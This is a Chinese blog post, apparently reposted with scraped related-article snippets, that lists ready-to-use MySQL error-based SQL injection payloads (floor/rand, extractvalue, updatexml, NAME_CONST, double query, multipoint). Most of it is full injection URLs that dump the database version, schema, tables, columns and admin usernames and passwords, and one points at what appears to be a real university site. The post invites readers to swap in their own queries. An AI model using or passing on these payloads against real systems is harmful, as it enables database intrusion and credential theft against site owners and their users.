2. 程式人生 > >MYSQL報錯註入方法整理

MYSQL報錯註入方法整理

阿新 發佈:2017-08-20
ipo poi floor extra 版本 註入 關鍵字 -1 format

1、通過floor暴錯

/*數據庫版本*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*連接用戶*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*連接數據庫*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴庫*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴表*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴字段*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴內容*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有長度限制,最長32位)

SQL 
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3、UpdateXml(有長度限制,最長32位)

SQL 
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

4、NAME_CONST(適用於低版本)

SQL 
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)

/*數據庫版本*/

SQL 
http://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

6、Multipoint(新方法)

/*數據庫版本*/

SQL 
http://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))

大家自己找關鍵字替換自己想要查詢的東西。

本文由Hack Blog原創,如需轉載註明原文鏈接http://www.hackblog.cn/post/36.html

MYSQL報錯註入方法整理

相關推薦

MYSQL方法整理

ipo poi floor extra 版本 註入 關鍵字 -1 format 1、通過floor暴錯 /*數據庫版本*/ SQL http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*)

【代碼審計】XDCMS

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

XerCMS-1.0.3代碼審計(文件名後臺getshell)

each orb his jpg pla module 將不 last self 鏈接:https://share.weiyun.com/6b98e41d036967178e1a21fb88ed340f (密碼:YnNY) 文件名報錯註入 index.php?m=memb

SQLmysql

顯錯註入 sql註入 mysql註入 在我們實際滲透中,明明發現一個註入點,本以為丟給sqlmap就可以了,結果sqlmap只顯示確實是註入點,但是數據庫卻獲取不了,如圖1所示,這時我們可以使用手工進行註入,判斷出過濾規則以及基本過濾情況,然後再選擇對應的sqlmap腳本(如果有的話),本

【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST)

span word form where sch select 技術 分享 less 這個和less18一樣,都是基於header的註入 這次的字段是referer Referer: 123‘ AND UpdateXml(1,concat(0x7e,database()

SQL總結

字段 name tab extra SQ password get upd 報錯 1.Floor()報錯註入 關於Floor報錯註入原理可以看http://blog.51cto.com/wt7315/1891458 獲取數據庫 select count(*),(conca

Python3 爬蟲編寫及解決方法整理

將爬蟲執行過程中遇到的錯誤進行整理,方便後來查詢 執行環境:Python3.6+Pydev 編碼錯誤 執行時候報錯:UnicodeEncodeError: ‘gbk’ codec can’t encode character ‘\u20

MySQL注入方法整理

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 報錯注入:(and後不能直接跟select,可以加()) 1.報錯注入floor-

win處navicat直接導出的sql腳本導Linux mysql問題

錯誤 www. nbsp 提取 xxx .com 根目錄 打開 win 最近幾天在把win上的項目的數據庫轉移到Ubuntu,於是第一件事就是從win處的navicat直接導出sql腳本,然後進入Ubuntu導入的時候會報錯誤,跳過錯誤繼續執行導致數據庫表的缺失。 跨平臺錯

mysql數據庫表字段使用DESC等關鍵字及解決方法

直接 方式 sel max desc base 字段名 字段 方法 <!-- desc是MySQL數據庫的關鍵字,作為字段名直接使用會報錯 --><sql id="Base_Column"> id,mol,ip,port,name,t.desc,m

安裝mysql解決方法

mysql報錯1:Installing MySQL system tables..../bin/mysqld: error while loading shared libraries: libaio.so.1: cannot open shared object file: No such file or

線上MYSQL同步故障處理方法總結

table 存在 index 刪除 查找 skip number hat rec 前言 在發生故障切換後,經常遇到的問題就是同步報錯,下面是最近收集的報錯信息。 記錄刪除失敗 在master上刪除一條記錄,而slave上找不到 Last_SQL_Error:

網站mysql防止sql*** 3種方法總結

詳細 pro 直接 coo ado 問題總結 color 都在 數據庫盲註 mysql數據庫一直以來都遭受到sql註入***的影響,很多網站,包括目前的PC端以及手機端都在使用php+mysql數據庫這種架構,大多數網站受到的***都是與sql註入***有關,那麽mysql

Mysql資料庫亂碼問題(資料庫連結、資料庫格式、資料表列的字符集都是UTF8,但還是會的解決方法

在做專案的時候遇到一個問題。插入資料的時候中文出現亂碼問題。檢視程式碼中與資料庫的連結,已經設定了UTF-8的編碼,檢視資料庫,資料庫格式也是UTF-8格式,檢視資料表的列,屬性也是UTF-8,檢視程式碼的編碼格式也是UTF-8,但是在插入資料的時候中文還是會出現亂碼問題。 最

Ubuntu/Debian(Raspbian)進入MySQL:ERROR 1698 (28000): Access denied for user 'root'@'localhost'的解決方法

樹莓派安裝MySQL未提示設定密碼,之後在sudo下無需密碼即可連線,其它輸入報錯ERROR 1698 (28000) 附:遠端連線MySQL出現1130錯誤解決方法 問題場景: 在樹莓派3B+,系統Raspbian(Debian9.4),安裝MySQL: sudo apt-g

mysql儲存emoji表情的處理方法【更改編碼為utf8mb4】

utf-8編碼可能2個位元組、3個位元組、4個位元組的字元,但是MySQL的utf8編碼只支援3位元組的資料,而移動端的表情資料是4個位元組的字元。如果直接往採用utf-8編碼的資料庫中插入表情資料,Java程式中將報SQL異常: java.sql.SQLException: Incorrect st

mysql存儲emoji表情的處理方法【更改編碼為utf8mb4】

ice filesyste 內容 except 位置 tween see red dir utf-8編碼可能2個字節、3個字節、4個字節的字符,但是MySQL的utf8編碼只支持3字節的數據,而移動端的表情數據是4個字節的字符。如果直接往采用utf-8編碼的數據庫中插入表情

windows10下的Mysql-8.0.11安裝教程以及的解決方法

一,安裝 點選以下連結可看安裝方法     win10下安裝mysql8.0.11 二,報錯的解決方法 問題1 :windows10系統下,在工作管理員中檢視的MySQL服務,每次開啟服務之後都會自動關閉??? 解決方法:檢視

vs2013+MySQL建立網站,在開發機器中可以執行,在非開發機器中釋出資料集的解決方法

問題如下: 網上所搜均不能解決問題。仔細思考後,發現自己之所以能執行網站,是因為自己裝了MySQL客戶端和vs,而別人的電腦是沒有這二者的,首先排除vs問題,具體是新建test網站,按照網上來配xsd和web.config,無效;然後考慮是否因為別人的電腦缺乏MyS

MySQLcannot add foreign key constraint解決方法

這種報錯是提示無法正確的插入外來鍵約束,那我分析一下,設定外來鍵有以下幾個條件: 1、要設定外來鍵的欄位不能為主鍵 2、改建所參考的欄位必須為主鍵 3、兩個欄位必須具有相同的資料型別和約束 滿足這三個條件一般在建立外來鍵的時候就不會報錯。